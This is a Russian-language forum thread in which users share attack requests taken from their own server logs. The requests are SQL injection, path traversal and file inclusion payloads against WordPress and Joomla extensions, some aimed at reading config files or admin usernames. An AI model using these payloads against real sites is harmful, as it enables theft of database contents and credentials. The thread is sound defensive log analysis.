×
Твой новый блог на Ruby on Rails (25 дек 2020)

Не жумлой единой, как говорится. Подключайтесь. :)

Вопрос Как взламывали Masterpro.ws

Больше
5 года 10 мес. назад #21 от serge
serge ответил в теме Как взламывали Masterpro.ws
Не встречал раньше атак на это расширение, взгляните. Что-то новое:

public_html/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

Насколько знаю, Revolution Slider Plugin - одно из расширений WordPress.

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
5 года 7 мес. назад #22 от serge
serge ответил в теме Как взламывали Masterpro.ws
Продолжаем публиковать варианты разнообразных атак, почерпнутых из логов сервера. Возможно, для кого-то это окажется познавательно, а для кого-то и поучительно. Взгляните, это уже попытка SQL-инъекции:

http://*************.ru/system/southidceditor//upload.asp?action=save&type=IMAGE&style=standard%27%20and%201=2%20union%20select%20S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20%5BS_ImageExt%5D%2b%27%7Ccer%7Caspx%7Ccdx%7Casp%7Casaspp%27,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord%20from%20ewebeditor_style%20where%20s_name=%27standard%27%20and%27a%27=%27a

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
5 года 1 мес. назад - 5 года 1 мес. назад #23 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Новая порция сценариев атак, целью которых теперь являются, как видите, RSGallery, Idoblog и Jomtube:

http://vash_site.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--&limitstart=15

http://vash_site.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--

http://vash_site.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453%20--%20;&option=com_jomtube

Помимо этого, возможно, будет интересно увидеть попытку использования совсем нового эксплоита, по ссылке .
Последнее редактирование: 5 года 1 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
5 года 1 мес. назад #24 от serge
serge ответил в теме Как взламывали Masterpro.ws
Простенькая попытка локального включения файла: атака на hdflvplayer:

http://vash_site.ru/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
5 года 1 мес. назад #25 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Рассматривая логи, вполне реально выявить наиболее уязвимые, или, сформулируем это так, наиболее часто атакуемые расширения. Попытка SQL инъекции, атака на Easybook:

http://vash_site.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
4 года 4 мес. назад #26 от serge
serge ответил в теме Как взламывали Masterpro.ws
Попытка SQL инъекции, используя уязвимость компонента июня 2016 года; Joomla BT Media (com_bt_media) Component - SQL Injection:

Страница: index.php?option=com_bt_media&view=list&categories[0]=1)+AND+(SELECT+1125+FROM(SELECT+COUNT(*),CONCAT(0x5f,0x7e,0x5f,(select+left(uu.username,100)+from+%23__users+as+uu+inner+join+%23__user_usergroup_map+as+uum+on+uu.id+=+uum.user_id+where+uum.group_id=8+limit+1),0x5f,0x7e,0x5f,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+(9320=9320

URI: option=com_bt_media&view=list&categories[0]=1) AND (SELECT 1125 FROM(SELECT COUNT(*),CONCAT(0x5f,0x7e,0x5f,(select left(uu.username,100) from #__users as uu inner join #__user_usergroup_map as uum on uu.id = uum.user_id where uum.group_id=8 limit 1),0x5f,0x7e,0x5f,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9320=9320

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.